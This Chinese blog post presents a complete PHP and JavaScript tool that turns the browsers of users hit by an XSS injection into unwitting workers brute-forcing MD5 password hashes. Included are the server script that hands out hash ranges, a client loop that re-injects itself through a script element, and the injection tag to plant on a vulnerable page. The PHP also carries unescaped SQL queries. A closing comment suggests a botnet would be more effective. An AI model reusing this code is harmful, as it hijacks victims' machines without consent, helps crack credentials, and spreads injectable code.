最新消息:
    你的位置:jinglingshu的博客 > PHP > XSS之分布式破解

    XSS之分布式破解

    PHP admin 1727浏览 0评论

    XSS可以做什么?

    窃取信息,worm攻击,钓鱼欺骗,DDOS。。。

    那XSS之分布式破解又是怎么回事呢??

    XSS是基于用户PC而非服务器的,那么被X的量肯定是很大滴,比如一个百度贴吧的xss分分钟就可以让你的收信箱爆掉,那为何我们不好好利用这些PC来为我们做服务呢?
    因为浏览器的限制,能提供的服务可能显得很少,但是做计算还是可以的。

    比如我在我的服务器上写个js脚本,每个被xss的用户来调用它都会为每个用户分配一个密文和一段不同的爆破区间(比如1-100000,100001-200000。。。),来让用户浏览器进行计算匹配
    如果某个浏览器计算并匹配成功就返回破解的明文,否则就再次加载这个js,继续爆破,如果xss量大的话,可以秒破哦!!!

    好了思路就是这样子,贴MD5破解的测试代码:

    001 <?php $link = mysql_connect('localhost', 'root', 'passss');
    002 if (!$link) {
    003         die('Could not connect: ' . mysql_error());
    004 }
    005 mysql_select_db('xss_crack', $link) or die ('Can\'t use foo : ' . mysql_error());
    006 ?>
    007
    008 <?php if (isset($_GET['edit'])) : ?>
    009         <form action="" method="POST">
    010                 密文:<input type="text" name="encode" value="" />
    011                 起点:<input type="text" name="current" value="0" />
    012                 区间:<input type="text" name="region" value="10000">
    013                 <input type="submit" value="Add" />
    014         </form>
    015 <?php elseif(isset($_GET['look'])) :
    016         $sql = "select encode,decode from crack order by addtime";       
    017         $res = @mysql_query($sql);
    018
    019         echo '<pre>';
    020         if (mysql_num_rows($res) > 0) {
    021                 while ($row = mysql_fetch_object($res)) {
    022                         echo $row -> encode."  --  ";
    023                         echo $row -> decode;
    024                         echo "\r\n";
    025                 }
    026                 mysql_free_result($res);
    027         }
    028         echo '</pre>';
    029 endif; ?>
    030
    031 <?php
    032 if (empty($_GET)) {
    033         $id = '';
    034         $encode = '';
    035         $current = '';
    036         $region = '';
    037
    038         $sql = "select * from crack where cracked=0 order by addtime limit 1;";
    039         $res = @mysql_query($sql);
    040
    041         if (mysql_num_rows($res) > 0) {
    042                 while ($row = mysql_fetch_object($res)) {
    043                         $id = $row -> id;
    044                         $encode = $row -> encode;
    045                         $current = $row -> current;
    046                         $region = $row -> region;
    047                 }
    048                 mysql_free_result($res);
    049                 $sql = "update crack set current=current+region where id=$id";
    050                 $res = @mysql_query($sql);
    051         }
    052 }
    053 ?>
    054
    055 <?php if (empty($_POST) && !empty($id)) :?>
    056         /*
    057          * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
    058          * Digest Algorithm, as defined in RFC 1321.
    059          * Copyright (C) Paul Johnston 1999 - 2000.
    060          * Updated by Greg Holt 2000 - 2001.
    061          * See http://pajhome.org.uk/site/legal.html for details.
    062          */
    063         var hex_chr = "0123456789abcdef";
    064         function rhex(num) {
    065                 str = "";
    066                 for ( j = 0; j <= 3; j++)
    067                         str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) + hex_chr.charAt((num >> (j * 8)) & 0x0F);
    068                 return str;
    069         }
    070
    071         function str2blks_MD5(str) {
    072                 nblk = ((str.length + 8) >> 6) + 1;
    073                 blks = new Array(nblk * 16);
    074                 for ( i = 0; i < nblk * 16; i++)
    075                         blks[i] = 0;
    076                 for ( i = 0; i < str.length; i++)
    077                         blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
    078                 blks[i >> 2] |= 0x80 << ((i % 4) * 8);
    079                 blks[nblk * 16 - 2] = str.length * 8;
    080                 return blks;
    081         }
    082
    083         function add(x, y) {
    084                 var lsw = (x & 0xFFFF) + (y & 0xFFFF);
    085                 var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
    086                 return (msw << 16) | (lsw & 0xFFFF);
    087         }
    088
    089         function rol(num, cnt) {
    090                 return (num << cnt) | (num >>> (32 - cnt));
    091         }
    092
    093         function cmn(q, a, b, x, s, t) {
    094                 return add(rol(add(add(a, q), add(x, t)), s), b);
    095         }
    096
    097         function ff(a, b, c, d, x, s, t) {
    098                 return cmn((b & c) | ((~b) & d), a, b, x, s, t);
    099         }
    100
    101         function gg(a, b, c, d, x, s, t) {
    102                 return cmn((b & d) | (c & (~d)), a, b, x, s, t);
    103         }
    104
    105         function hh(a, b, c, d, x, s, t) {
    106                 return cmn(b ^ c ^ d, a, b, x, s, t);
    107         }
    108
    109         function ii(a, b, c, d, x, s, t) {
    110                 return cmn(c ^ (b | (~d)), a, b, x, s, t);
    111         }
    112
    113         function MD5(str) {
    114                 x = str2blks_MD5(str);
    115                 var a = 1732584193;
    116                 var b = -271733879;
    117                 var c = -1732584194;
    118                 var d = 271733878;
    119                 for ( i = 0; i < x.length; i += 16) {
    120                         var olda = a;
    121                         var oldb = b;
    122                         var oldc = c;
    123                         var oldd = d;
    124                         a = ff(a, b, c, d, x[i + 0], 7, -680876936);
    125                         d = ff(d, a, b, c, x[i + 1], 12, -389564586);
    126                         c = ff(c, d, a, b, x[i + 2], 17, 606105819);
    127                         b = ff(b, c, d, a, x[i + 3], 22, -1044525330);
    128                         a = ff(a, b, c, d, x[i + 4], 7, -176418897);
    129                         d = ff(d, a, b, c, x[i + 5], 12, 1200080426);
    130                         c = ff(c, d, a, b, x[i + 6], 17, -1473231341);
    131                         b = ff(b, c, d, a, x[i + 7], 22, -45705983);
    132                         a = ff(a, b, c, d, x[i + 8], 7, 1770035416);
    133                         d = ff(d, a, b, c, x[i + 9], 12, -1958414417);
    134                         c = ff(c, d, a, b, x[i + 10], 17, -42063);
    135                         b = ff(b, c, d, a, x[i + 11], 22, -1990404162);
    136                         a = ff(a, b, c, d, x[i + 12], 7, 1804603682);
    137                         d = ff(d, a, b, c, x[i + 13], 12, -40341101);
    138                         c = ff(c, d, a, b, x[i + 14], 17, -1502002290);
    139                         b = ff(b, c, d, a, x[i + 15], 22, 1236535329);
    140                         a = gg(a, b, c, d, x[i + 1], 5, -165796510);
    141                         d = gg(d, a, b, c, x[i + 6], 9, -1069501632);
    142                         c = gg(c, d, a, b, x[i + 11], 14, 643717713);
    143                         b = gg(b, c, d, a, x[i + 0], 20, -373897302);
    144                         a = gg(a, b, c, d, x[i + 5], 5, -701558691);
    145                         d = gg(d, a, b, c, x[i + 10], 9, 38016083);
    146                         c = gg(c, d, a, b, x[i + 15], 14, -660478335);
    147                         b = gg(b, c, d, a, x[i + 4], 20, -405537848);
    148                         a = gg(a, b, c, d, x[i + 9], 5, 568446438);
    149                         d = gg(d, a, b, c, x[i + 14], 9, -1019803690);
    150                         c = gg(c, d, a, b, x[i + 3], 14, -187363961);
    151                         b = gg(b, c, d, a, x[i + 8], 20, 1163531501);
    152                         a = gg(a, b, c, d, x[i + 13], 5, -1444681467);
    153                         d = gg(d, a, b, c, x[i + 2], 9, -51403784);
    154                         c = gg(c, d, a, b, x[i + 7], 14, 1735328473);
    155                         b = gg(b, c, d, a, x[i + 12], 20, -1926607734);
    156                         a = hh(a, b, c, d, x[i + 5], 4, -378558);
    157                         d = hh(d, a, b, c, x[i + 8], 11, -2022574463);
    158                         c = hh(c, d, a, b, x[i + 11], 16, 1839030562);
    159                         b = hh(b, c, d, a, x[i + 14], 23, -35309556);
    160                         a = hh(a, b, c, d, x[i + 1], 4, -1530992060);
    161                         d = hh(d, a, b, c, x[i + 4], 11, 1272893353);
    162                         c = hh(c, d, a, b, x[i + 7], 16, -155497632);
    163                         b = hh(b, c, d, a, x[i + 10], 23, -1094730640);
    164                         a = hh(a, b, c, d, x[i + 13], 4, 681279174);
    165                         d = hh(d, a, b, c, x[i + 0], 11, -358537222);
    166                         c = hh(c, d, a, b, x[i + 3], 16, -722521979);
    167                         b = hh(b, c, d, a, x[i + 6], 23, 76029189);
    168                         a = hh(a, b, c, d, x[i + 9], 4, -640364487);
    169                         d = hh(d, a, b, c, x[i + 12], 11, -421815835);
    170                         c = hh(c, d, a, b, x[i + 15], 16, 530742520);
    171                         b = hh(b, c, d, a, x[i + 2], 23, -995338651);
    172                         a = ii(a, b, c, d, x[i + 0], 6, -198630844);
    173                         d = ii(d, a, b, c, x[i + 7], 10, 1126891415);
    174                         c = ii(c, d, a, b, x[i + 14], 15, -1416354905);
    175                         b = ii(b, c, d, a, x[i + 5], 21, -57434055);
    176                         a = ii(a, b, c, d, x[i + 12], 6, 1700485571);
    177                         d = ii(d, a, b, c, x[i + 3], 10, -1894986606);
    178                         c = ii(c, d, a, b, x[i + 10], 15, -1051523);
    179                         b = ii(b, c, d, a, x[i + 1], 21, -2054922799);
    180                         a = ii(a, b, c, d, x[i + 8], 6, 1873313359);
    181                         d = ii(d, a, b, c, x[i + 15], 10, -30611744);
    182                         c = ii(c, d, a, b, x[i + 6], 15, -1560198380);
    183                         b = ii(b, c, d, a, x[i + 13], 21, 1309151649);
    184                         a = ii(a, b, c, d, x[i + 4], 6, -145523070);
    185                         d = ii(d, a, b, c, x[i + 11], 10, -1120210379);
    186                         c = ii(c, d, a, b, x[i + 2], 15, 718787259);
    187                         b = ii(b, c, d, a, x[i + 9], 21, -343485551);
    188                         a = add(a, olda);
    189                         b = add(b, oldb);
    190                         c = add(c, oldc);
    191                         d = add(d, oldd);
    192                 }
    193                 return rhex(a) + rhex(b) + rhex(c) + rhex(d);
    194         }
    195
    196         function CreateHTTPObject() {
    197                 var xmlhttp;
    198
    199                 try {
    200                         xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
    201                 } catch (e) {
    202                         try {
    203                                 xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    204                         } catch (e) {
    205                                 xmlhttp = false;
    206                         }
    207                 }
    208
    209                 if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
    210                         try {
    211                                 xmlhttp = new XMLHttpRequest();
    212                         } catch (e) {
    213                                 xmlhttp = false;
    214                         }
    215                 }
    216
    217                 if (!xmlhttp && window.createRequest) {
    218                         try {
    219                                 xmlhttp = window.createRequest();
    220                         } catch (e) {
    221                                 xmlhttp = false;
    222                         }
    223                 }
    224
    225                 return xmlhttp;
    226         }
    227
    228         function post(url, data) {
    229                 var xmlhttp = CreateHTTPObject();
    230                 if (xmlhttp) {
    231                         xmlhttp.open("POST", url, true);
    232                         xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    233                         xmlhttp.send(data);
    234                 }
    235         }
    236
    237         function badunload(url, id, current, region) {
    238
    239                 post(url, data);
    240         }
    241
    242         function sleep(n)
    243         {
    244                 var start=new Date().getTime();
    245                 while(true) {
    246                         if(new Date().getTime() - start > n)
    247                                 break;
    248                 }
    249         }
    250
    251         var id = <?php echo $id; ?>;
    252         var encode = '<?php echo $encode; ?>';
    253         var current = <?php echo $current; ?>;
    254         var region = <?php echo $region; ?>;
    255         var url = '<?php echo 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; ?>';
    256         var data = '';
    257
    258         var cracked = false;
    259         var decode = '';
    260         region += current;
    261         while(current < region) {
    262                 if (MD5(String(current)) == encode) {
    263                         cracked = true;
    264                         decode = current;
    265                         break;
    266                 }
    267                 current++;
    268         }
    269
    270         if (cracked) {
    271                 data = 'id='+id+'&cracked=1'+'&decode='+encodeURIComponent(decode);
    272                 post(url, data);
    273         } else {
    274                 data = 'id='+id+'&cracked=0';
    275                 post(url, data);
    276                 var evil = document.createElement('script');
    277                 evil.src = url;
    278                 document.head.appendChild(evil);
    279         }
    280 <?php endif; ?>
    281
    282 <?php
    283         if (isset($_POST['cracked'])) {
    284                 if ($_POST['cracked'] == 1) {
    285                         $decode = $_POST['decode'];
    286                         $id = $_POST['id'];
    287                         $sql = "update crack set cracked=1,decode='$decode' where id=$id;";
    288                         @mysql_query($sql);
    289                 }
    290         }
    291         else {
    292                 if (isset($_POST['encode'])) {
    293                         $encode = $_POST['encode'];
    294                         $current = $_POST['current'];
    295                         $region = $_POST['region'];
    296                         $addtime = date('Y-m-d H:i:s');
    297                         $sql = "insert into crack(encode,current,region,addtime) value('$encode', '$current', '$region', '$addtime')";
    298                         @mysql_query($sql);
    299                 }
    300         }
    301 ?>

    我用chrome开了三个标签页,破解八位数的,大概3分钟的样子。文章这只是一个思路而已,欢迎各位继续拓展(*^_^*)

    使用说明:
    http://127.0.0.1/mian.php?edit 是添加待爆破密文的页面
    http://127.0.0.1/mian.php?look 是查看爆破成功的页面
    xss点引入脚本

    1 <script src='http://127.0.0.1/main.php'></script>

    由于我编程技术不行,现在只是实现纯数字的爆破。。。。
    而且如果某个用户中途关闭了页面,而分配给他的区间又恰好是密码所在区间那么就算你倒霉破解不出来了。。。

    附源码:xss_crack (仅供技术交流探讨使用

    secmap:这想法我之前就实现过,最后测评了下,发现最大的瓶颈在于浏览器计算能力非常低,浏览器的计算力相当于正常cpu的30%吧.而且是不连续的,这就牵扯到算力的有效计算时间.
    粗略的算下 有1w的pv 每个人访问停留15s 那就相当与40个小时的cpu时间 ,因为浏览器不比cpu 所以也就相当于单核cpu跑了12小时的md5….. 就算是任务下发的形式.也会出现有些任务接到了,破了,但是”成果”没能提交到服务器上.这样的话 还不到12小时…现在的gpu估计随随便便就是cpu算力的百倍以上了吧?

    ps:有那流量,还不如挂僵尸网络有前途.

    转载请注明:jinglingshu的博客 » XSS之分布式破解

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址